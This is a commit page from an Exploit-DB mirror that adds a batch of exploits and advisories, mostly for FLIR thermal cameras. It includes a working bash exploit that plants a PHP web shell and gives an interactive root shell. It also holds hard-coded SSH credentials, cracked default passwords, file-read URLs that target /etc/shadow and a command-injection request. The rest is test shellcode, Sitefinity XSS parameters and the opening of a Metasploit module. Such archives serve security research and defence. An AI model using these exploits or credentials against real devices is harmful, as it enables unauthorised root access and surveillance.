bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-09-27

Browse source 
8 new exploits

Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)
Supervisor 3.0a1 < 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)
FLIR Thermal Camera F/FC/PT/D - SSH Backdoor
NodeJS Debugger - Command Injection (Metasploit)

Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)
FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution
FLIR Thermal Camera F/FC/PT/D - Information Disclosure
FLIR Thermal Camera FC-S/PT - Command Injection
FLIR Thermal Camera F/FC/PT/D - Stream Disclosure
Sitefinity CMS 9.2 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2017-09-27 05:01:31 +00:00
parent f27338c1f7
commit a06626c22f
9 changed files with 886 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -15731,7 +15731,7 @@ id,file,description,date,author,platform,type,port
42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0
42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
42779,platforms/linux/remote/42779.rb,"Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,linux,remote,9001
42779,platforms/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,linux,remote,9001
41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
@ -15852,6 +15852,8 @@ id,file,description,date,author,platform,type,port
42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80
42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0
42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16500,6 +16502,7 @@ id,file,description,date,author,platform,type,port
42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
42791,platforms/lin_x86-64/shellcode/42791.c,"Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -38557,3 +38560,8 @@ id,file,description,date,author,platform,type,port
42774,platforms/php/webapps/42774.txt,"Secure E-commerce Script 1.02 - 'sid' Parameter SQL Injection",2017-09-22,8bitsec,php,webapps,0
42775,platforms/php/webapps/42775.txt,"PHP Auction Ecommerce Script 1.6 - SQL Injection",2017-09-22,8bitsec,php,webapps,0
42776,platforms/asp/webapps/42776.txt,"JitBit HelpDesk < 9.0.2 - Authentication Bypass",2017-09-22,Kc57,asp,webapps,0
42785,platforms/hardware/webapps/42785.sh,"FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution",2017-09-25,LiquidWorm,hardware,webapps,0
42786,platforms/hardware/webapps/42786.txt,"FLIR Thermal Camera F/FC/PT/D - Information Disclosure",2017-09-25,LiquidWorm,hardware,webapps,0
42788,platforms/hardware/webapps/42788.txt,"FLIR Thermal Camera FC-S/PT - Command Injection",2017-09-25,LiquidWorm,hardware,webapps,0
42789,platforms/hardware/webapps/42789.txt,"FLIR Thermal Camera F/FC/PT/D - Stream Disclosure",2017-09-25,LiquidWorm,hardware,webapps,0
42792,platforms/asp/webapps/42792.txt,"Sitefinity CMS 9.2 - Cross-Site Scripting",2017-08-31,"Pralhad Chaskar",asp,webapps,0

Can't render this file because it is too large.

76
platforms/asp/webapps/42792.txt Executable file
View file

@ -0,0 +1,76 @@
# Exploit Title: Stored Cross Site Scripting (XSS) in Progress Sitefinity CMS 9.2
# Date: Aug 31, 2017
# Exploit Author: Pralhad Chaskar
# Vendor Homepage: http://www.sitefinity.com/
# Tested on: Progress Sitefinity CMS 9.2 and lower
# CVE : NA
Vendor Description
------------------
Progress® Sitefinity™ is a content management and marketing analytics platform designed to maximize the agility needed to succeed in todays rapidly changing digital marketplace. It provides developers and IT teams the tools they need to support enterprise-level digital marketing, optimizing the customer journey by delivering seamless personalized experiences across different technologies and devices. Progress is a trusted source for the digital marketing innovation needed to create transformative customer experiences that fuel business success.
Description
------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Vulnerability Class
--------------------
Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of Concept
----------------
Below mentioned input fields aren't properly escaped. This could lead to an XSS attack that could possibly affect administrators, users, editor.
http://xx.sitefinity.com/Sitefinity/Pages
Parameter : Page Title
Method: POST
http://xx.sitefinity.com/Sitefinity/Content/News
Parameter : News Title
Method: POST
http://xx.sitefinity.com/Sitefinity/Content/List
Parameter : List Title
Method: POST
http://xx.sitefinity.com/Sitefinity/Content/Documents/LibraryDocuments/incident-request-attachments
Parameter : Document Title
Method: POST
http://xx.sitefinity.com/Sitefinity/Content/Images/LibraryImages/newsimages
Parameter : Image Title
Method: POST
http://xx.sitefinity.com/Sitefinity/Content/links
Parameter : Link Title
Method: POST
http://xx.sitefinity.com/Sitefinity/Content/Videos/LibraryVideos/default-video-library
Parameter : Video Title
Method: POST
Vendor Contact Timeline
------------------------
Discovered: October 16, 2016
Vendor Notification: October 18, 2016
Advisory Publication: Aug 31, 2017
Public Disclosure: Aug 31, 2017
Affected Targets
----------------
Sitefinity CMS 9.2 and lower
Solution
--------
Upgrade to Sitefinity CMS 10.1 to fix this issue.
Credits
-------
Pralhad Chaskar
Information Security Analyst
Help AG Middle East
References
----------
[1] Help AG Middle East http://www.helpag.com/
[2] Sitefinity CMS Version Notes http://www.sitefinity.com/product/version-notes

54
platforms/hardware/remote/42787.txt Executable file
View file

@ -0,0 +1,54 @@
FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials
Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
Software version: 10.0.2.43
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
FC-Series S (FC-334-NTSC)
FC-Series ID
FC-Series-R
PT-Series (PT-334 200562)
D-Series
F-Series
Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
bring thermal and visible-light imaging together in a system that gives you
video and control over both IP and analog networks. The PT-Series' precision
pan/tilt mechanism gives you accurate pointing control while providing fully
programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
PT-Series cameras define a new standard of performance with five models that
provide full 640x480 thermal resolution.
Desc: FLIR utilizes hard-coded credentials within its Linux distribution image.
These sets of credentials are never exposed to the end-user and cannot be changed
through any normal operation of the camera.
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
Nexus Server/2.5.29.0
Nexus Server/2.5.14.0
Nexus Server/2.5.13.0
lighttpd/1.4.28
PHP/5.4.7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5436
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5436.php
23.03.2017
--
root:indigo
root:video
default:video
default:[blank]
ftp:video

101
platforms/hardware/webapps/42785.sh Executable file
View file

@ -0,0 +1,101 @@
#!/bin/bash
#
#
# FLIR Systems FLIR Thermal Camera PT-Series (PT-334 200562) Remote Root Exploit
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: http://www.flir.com
# Affected version: Firmware version: 8.0.0.64
# Software version: 10.0.2.43
# Release: 1.3.4 GA, 1.3.3 GA and 1.3.2
#
# Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
# bring thermal and visible-light imaging together in a system that gives you
# video and control over both IP and analog networks. The PT-Series' precision
# pan/tilt mechanism gives you accurate pointing control while providing fully
# programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
# PT-Series cameras define a new standard of performance with five models that
# provide full 640x480 thermal resolution.
#
# Desc: FLIR Camera PT-Series suffers from multiple unauthenticated remote command
# injection vulnerabilities. The vulnerability exist due to several POST parameters
# in controllerFlirSystem.php script when calling the execFlirSystem() function not
# being sanitized when using the shell_exec() PHP function while updating the network
# settings on the affected device. This allows the attacker to execute arbitrary system
# commands as the root user and bypass access controls in place.
#
# ========================================================
#
# bash-3.2$ ./flir0.sh 10.0.0.10 8088
#
# Probing target: http://10.0.0.10:8088
#
# Status: 200
# Target seems OK!
# You got shell!
# Ctrl+C to exit.
#
# [root@FLIR ~]# id;pwd;uname -a
# uid=0(root) gid=0(root)
# /var/www/data/maintenance
# Linux FLIR 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082 #1 Wed May 1 12:25:27 PDT 2013 armv5tejl unknown
# [root@FLIR ~]# ^C
# bash-3.2$
#
# ========================================================
#
# Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
# Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
# Nexus Server/2.5.29.0
# Nexus Server/2.5.14.0
# Nexus Server/2.5.13.0
# lighttpd/1.4.28
# PHP/5.4.7
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5438
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5438.php
#
#
# 23.03.2017
#
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
echo -e "Usage: $0 ipaddr port\\n"
exit 1
fi
ip=$1
port=$2
echo -e "\\nProbing target: http://$ip:$port\\n"
payload="dns%5Bdhcp%5D=%60echo+\"<?php+system(\\\\\$_GET['c']);?>\">test.php%60&dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D="
htcode=$(curl -Is -G http://"$ip":"$port"/maintenance/controllerFlirSystem.php -d"$payload" 2>/dev/null | head -1 | awk -F" " '{print $2}')
echo -ne "Status: "; echo "$htcode"
if [ "$htcode" == "200" ]; then
echo "Target seems OK!"
else
echo "Ajdee...something went wrong. Check your target."
exit 1
fi
echo -e "You got shell!\\nCtrl+C to exit.\\n"
while true; do
echo -ne "\\033[31m";
read -rp "[root@FLIR ~]# " cmd
echo -ne "\\033[00m";
shell="http://$ip:$port/maintenance/test.php?c=${cmd// /+}"
curl "$shell"
done

373
platforms/hardware/webapps/42786.txt Executable file
View file

@ -0,0 +1,373 @@
FLIR Systems FLIR Thermal Camera F/FC/PT/D Multiple Information Disclosures
Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
Software version: 10.0.2.43
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
FC-Series S (FC-334-NTSC)
FC-Series ID
FC-Series R
PT-Series (PT-334 200562)
D-Series
F-Series
Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
bring thermal and visible-light imaging together in a system that gives you
video and control over both IP and analog networks. The PT-Series' precision
pan/tilt mechanism gives you accurate pointing control while providing fully
programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
PT-Series cameras define a new standard of performance with five models that
provide full 640x480 thermal resolution.
Desc: Input passed thru several parameters is not properly verified before
being used to read files. This can be exploited by an unauthenticated attacker
to read arbitrary files from local resources.
==============================================================================
/var/www/data/controllers/api/xml.php:
--------------------------------------
68: private function readFile($file)
69: {
70: if (!empty($file) && file_exists($file)) {
71: $xml = file_get_contents($file);
72: $this->setVar('result', $xml);
73: $this->loadView('webservices/default');
74: }
75: else {
76: $this->loadPageNotFound();
77: }
78: }
==============================================================================
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
Nexus Server/2.5.29.0
Nexus Server/2.5.14.0
Nexus Server/2.5.13.0
lighttpd/1.4.28
PHP/5.4.7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5434
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5434.php
23.03.2017
--
Requests:
GET http://TARGET/api/xml?file=/var/www/data/modules/legacy/config.php HTTP/1.1
Output:
=====================================================================
<?php
$configFile = "config.ini";
// load configuration params
$config = parse_ini_file($configFile);
if (!$config || count($config) == 0 || !isset($config["dir_nexus"]))
die("error loading configuration file...");
// TODO if don't exist configuration, create config.ini according system and nexus setup
// global
define ("BASE", $config["dir_nexus"]);
define ("BIN", $config["dir_bin"]);
define ("TMP_DIR", $config["dir_tmp"]);
define ("SERVER_DIR", $config["dir_server"]);
define ("CONF_DIR", $config["dir_conf"]);
define ("WEB_DIR", "/web/");
define ("TOOLS_DIR", "/tools/");
define ("HARDWARE_DIR", "/hardware/");
define ("BACKUPS_DIR", "/backups/");
define ("BACKUPS_INI_DIR", BACKUPS_DIR . "ini_files/");
define ("BACKUPS_SYS_DIR", BACKUPS_DIR . "system_files/");
// server files
define ("INI_FILE", "/server/conf/server.ini");
define ("INI_DEFAULTS", "factory.defaults");
define ("LOG_FILE", "server.log");
define ("LOG_DEFAULT_PATH","/server/logs");
define ("SCANLIST_DEFAULT_PATH","/server/sl");
define ("LIC_FILE", "/server/license/license.txt");
define ("ZOOM_LUT_FILE", "/server/conf/zoom_lut.txt");
define ("DICTIONARY_FILE", "/server/conf/dictionary.txt");
define ("PELOC_D_FILE", "/server/conf/PelcoD.map");
define ("FIRMWARE_FILE", "firmware.sh");
define ("HARDWARE_FILE", BASE."/hardware/hardware.cfg");
// server ini
define ("INI_SECTION_DEVICES", "Devices");
define ("INI_SECTION_DEVICES_IDS", " Ids");
define ("INI_SECTION_DEVICES_INTERFACE", "INTERFACE");
define ("INI_SECTION_INTERFACE", INI_SECTION_DEVICES_INTERFACE . " Configuration - Device ");
// nexus cgi
define ("NEXUSCGI_DEFAULTPORT", 0);
define ("NEXUSCGI_TYPE", "Nexus CGI Interface");
// web
define ("USERS_FILE", "config/app/users.txt");
define ("WEBVERSION", "3.4.0.0");
define ("RECOMENDEDSERVERVERSION", "2.5.13.0");
// xml files
define ("devicesFOLDER","devices");
define ("configFOLDER","configuration");
define ("driversFOLDER","drivers");
// system
// TODO
define ("UNZIP","/usr/bin/unzip");
define ("ZIP","/usr/bin/zip");
define ("SUDO", $config["sudo"]);
define ("FLIRSYS", $config["flir_system"]);
define ("FLIRSTP", $config["flir_setup"]);
define ("CONFSRC", $config["config_source_dir"]);
define ("INISRC", $config["config_source_ini_dir"]);
define ("LOCK_FILE", "/server/conf/.locked");
// service
define ("START", SUDO . $config["service_start"]);
define ("STOP", SUDO . $config["service_stop"]);
define ("STATUS", SUDO . $config["service_status"]);
// server file
define ("SERVER_FILE", SERVER_DIR . "bin/" .$config["server_file"]);
define ("STARTUP_FILE", $config["startup_file"]);
define ("BOOT_FILE", $config["boot_file"]);
define ('LINE_FEED', "\n");
// help
define ("HELP_FILES", $config["help_files"]);
// Debug mode
define("DEBUG", $config["debug_mode"]);
?>
=====================================================================
Other file requests:
--------------------
http://TARGET/api/xml?file=/etc/passwd
http://TARGET/api/xml?file=/etc/shadow
http://TARGET/api/xml?file=/proc/version
http://TARGET/api/xml?file=/root/.ssh/authorized_keys
http://TARGET/api/xml?file=/var/www/lighttpd.conf
http://TARGET/api/xml?file=../../../../../../../../../etc/passwd
http://TARGET/api/file/download/etc/shadow
http://TARGET/api/file/download/etc/passwd
http://TARGET/api/file/content/etc/shadow
http://TARGET/api/file/content/var/log/messages
http://TARGET/api/server/videosnap?file=../../../../../../etc/passwd
http://TARGET/onvif/device_service
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/MessagingConfig.xml
http://TARGET/api/server/status/full
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/FC-334-NTSC.ini
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/scheduler.xml
http://TARGET/page/maintenance/view/server-lan
http://TARGET/api/xml?file=/tmp/SW_versions.txt
http://TARGET/api/xml?file=/usr/local/nexus/hardware/hardware.cfg
http://TARGET/api/file/ini/read
The clear.sh script:
--------------------
http://TARGET/api/xml?file=/var/www/data/config/app/clear.sh
Output:
=====================================================================
#!/bin/bash
########
# is web root
if [ ! -f "index.php" ]
then
echo "please, run from web root"
exit -1
fi
# delete old files with spaces
echo "deleting deprecated files (with spaces, ampersand and/or dots)"
find . -name "* *" -print0 | xargs -0 rm -f
echo
# files to delete (deprecated, old...)
FILES_TODETELE="webroot/images/models/
webroot/js/old/
FLIRish.php
footer.html.php
getCgiPort.php
global_functions.php
headerNavigation.php
index-login
isUserogged.php
log_users.php
mobile-loading.php
mobile-meta
testApifile.php
unauthorized.php
users.txt
wizard.php
api/
bundle/
conf/
config/app/clientdesc
config/app/update-files.sh
config/boot_settings.json
config/config.ini
flirfiles/
help/
js/
livevideo/
maintenance/
modules/legacy/
setup/
styles/
tmp/user_permissions.json
xmlfiles/
views/main/maintenance/files-extra.php
webroot/images/mobile/
webroot/images/livevideo/
webroot/images/advancedBottom.png
webroot/images/advancedMiddle.png
webroot/images/advancedTop.png
webroot/images/arrowUpMini.png
webroot/images/bgBottom.png
webroot/images/bgButton.png
webroot/images/bgButtonOn.png
webroot/images/bgFullBottom.png
webroot/images/bgFullMiddle.png
webroot/images/bgFullTop.png
webroot/images/bgMiddle.png
webroot/images/bgTop.png
webroot/images/bottomBar.png
webroot/images/flir.ico
webroot/images/leftMenuButton.png
webroot/images/_logoFlirMini
webroot/images/logoFlir.png
webroot/images/logoFlirMini.png
webroot/images/radio.png
webroot/images/tabBackground.png
webroot/css/flir.base.css
webroot/css/flir.ie.css
webroot/css/flir.maintenance.css
webroot/css/flir.mobile.css
webroot/css/flir.setup.css
webroot/css/flir.video.css
webroot/css/flir.wizard.css
webroot/css/jquery/jquery.jscrollpane.css
webroot/css/jquery/jquery-ui-1.8.7.custom.css
webroot/js/PIE_uncompressed.js
webroot/js/jquery/jquery-1.5.1.min.js
webroot/js/jquery/jquery-1.5.min.js
webroot/js/jquery/plugins/jquery.ba-dotimeout.js
webroot/js/jquery/plugins/jquery.dd.js
webroot/js/jquery/plugins/jquery.forms.js
webroot/js/jquery/plugins/jquery.i18n.properties-1.0.9.js
webroot/js/jquery/plugins/jquery.jscrollpane.js
webroot/js/jquery/plugins/jquery.mousewheel.js
webroot/js/jquery/plugins/jquery.touchable.js
webroot/js/jquery/plugins/jquery.touchable.js.orig
webroot/xml/host_types.xml
webroot/xml/devices/em
webroot/xml/devices/foveal
webroot/xml/devices/foveus/foveus_Foveus.xml
webroot/xml/devices/foveus/foveus_PTZ35x140.xml
webroot/xml/devices/foveus/foveus_Voyager.xml
webroot/xml/devices/geo/geo_Georeference.xml
webroot/xml/devices/gyro/gyro_TCM2.6.xml
webroot/xml/devices/i2c
webroot/xml/devices/interface/interface_Genetec.xml
webroot/xml/devices/interface/interface_ONVIF.xml
webroot/xml/devices/ir/ir_Microcore275Z.xml
webroot/xml/devices/ir/ir_Thermovision-2000.xml
webroot/xml/devices/ir/ir_Thermovision-3000.xml
webroot/xml/devices/onboard/onboard_LTC2990.xml
webroot/xml/devices/onboard/onboard_LTC2991.xml
webroot/xml/devices/osd/osd_BOB3.xml
webroot/xml/devices/pelco/pelco_PELCO_D.xml
webroot/xml/devices/pharos/pharos_Pharos.xml
webroot/xml/devices/plat/plat_Sagebrush.xml
webroot/xml/devices/plat/plat_Vehicle.xml
webroot/xml/devices/tass/tass_TASS.xml
webroot/xml/devices/video/video_Pleora.xml
webroot/xml/devices/visca/visca_VISCA.xml
webroot/xml/devices/thermostate
webroot/xml/devices/tvi"
# delete files
echo "clearing files"
for oldfile in $FILES_TODETELE
do
echo "deleting $oldfile"
rm -rf $oldfile
done
echo
######
exit 0
=====================================================================
Disclosing usernames and hashes:
--------------------------------
http://TARGET/api/xml?file=/var/www/data/config/app/users.txt
user=ee11cbb19052e40b07aac0ca060c23ee
expert=b9b83bad6bd2b4f7c40109304cf580e1
admin=15f9a55de61622e9c2a61ce72663dc08
production=c8348b2fb046ff758256b3a5eadb4a8c
calibration=11df08a6fb66c9ae4eab03ba7db123b0
ee11cbb19052e40b07aac0ca060c23ee MD5 : user
b9b83bad6bd2b4f7c40109304cf580e1 MD5 : expert
15f9a55de61622e9c2a61ce72663dc08 MD5 : fliradmin
c8348b2fb046ff758256b3a5eadb4a8c MD5 : flirproduction
11df08a6fb66c9ae4eab03ba7db123b0 MD5 : flircal
Default credentials:
user:user
expert:expert
admin:fliradmin
production:flirproduction
calibration:flircal
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/admin.passwd
AeRMh9wBkCS9k
Product info:
-------------
http://TARGET/api/system/config/product
{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]}

60
platforms/hardware/webapps/42788.txt Executable file
View file

@ -0,0 +1,60 @@
FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection
Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
Software version: 10.0.2.43
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
FC-Series S (FC-334-NTSC)
PT-Series (PT-334 200562)
Summary: Get the best image detail in challenging imaging environments with the
FLIR FC-Series S thermal network camera. The award-winning FC-Series S camera
sets the industry standard for high-quality thermal security cameras, ideal for
perimeter protection applications. The FC-Series S is capable of replacing multiple
visible cameras and any additional lighting and infrastructure needed to support
them.
Desc: FLIR FC-S/PT series suffer from an authenticated OS command injection vulnerability.
This can be exploited to inject and execute arbitrary shell commands as the root user.
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
Nexus Server/2.5.29.0
Nexus Server/2.5.14.0
Nexus Server/2.5.13.0
lighttpd/1.4.28
PHP/5.4.7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5437
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5437.php
23.03.2017
--
PoC request (sleep 17):
POST /page/maintenance/lanSettings/dns HTTP/1.1
Host: TARGET
Content-Length: 64
Accept: */*
Origin: http://TARGET
X-Requested-With: XMLHttpRequest
User-Agent: Testingus/1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET/maintenance
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
Connection: close
dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60

51
platforms/hardware/webapps/42789.txt Executable file
View file

@ -0,0 +1,51 @@
FLIR Systems FLIR Thermal Camera F/FC/PT/D Stream Disclosure
Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
Software version: 10.0.2.43
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
FC-Series S (FC-334-NTSC)
FC-Series ID
FC-Series-R
PT-Series (PT-334 200562)
D-Series
F-Series
Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
bring thermal and visible-light imaging together in a system that gives you
video and control over both IP and analog networks. The PT-Series' precision
pan/tilt mechanism gives you accurate pointing control while providing fully
programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
PT-Series cameras define a new standard of performance with five models that
provide full 640x480 thermal resolution.
Desc: FLIR suffers from an unauthenticated and unauthorized live stream disclosure.
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
Nexus Server/2.5.29.0
Nexus Server/2.5.14.0
Nexus Server/2.5.13.0
lighttpd/1.4.28
PHP/5.4.7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5435
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php
23.03.2017
--
PoC:
http://TARGET:8081/graphics/livevideo/stream/stream3.jpg
http://TARGET:8081/graphics/livevideo/stream/stream1.jpg

72
platforms/lin_x86-64/shellcode/42791.c Executable file
View file

@ -0,0 +1,72 @@
/*
;Title: Linux/x86_64 - mkdir() shellcode (30 bytes)
;Author: Touhid M.Shaikh
;Contact: *https://github.com/touhidshaikh
<https://github.com/touhidshaikh>*
;Category: Shellcode
;Architecture: Linux x86_64
;Description: Create Folder with 755 permission.
; You can Change folder by change code in ASM in fname Field
;Shellcode Length: 30
;Tested on : Debian 4.12.6-1kali6 (2017-08-30) x86_64 GNU/Linux
===== COMPILATION AND EXECUTION Assemmbly file =====
#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
#ld shell.o -o shell <=== Making Binary File
#./bin2shell.sh shell <== xtract hex code from the binary
(https://github.com/touhidshaikh/bin2shell)
=================SHELLCODE(INTEL FORMAT)=================
section .text
global _start
_start:
jmp folder
main:
xor rax,rax
pop rdi
mov si,0x1ef ;<--- Set Permission
add al,83
syscall
xor rax,rax
add al,60
syscall
folder:
call main
fname db "evil" ;<---Change Folder Name Here
=======================END HERE============================
====================FOR C Compile===========================
Compile with gcc with some options.
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = "\xeb\x13\x48\x31\xc0\x5f\x66\
xbe\xef\x01\x04\x53\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\
xe8\xe8\xff\xff\xff\x65\x76\x69\x6c";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

90
platforms/multiple/remote/42793.rb Executable file
View file

@ -0,0 +1,90 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
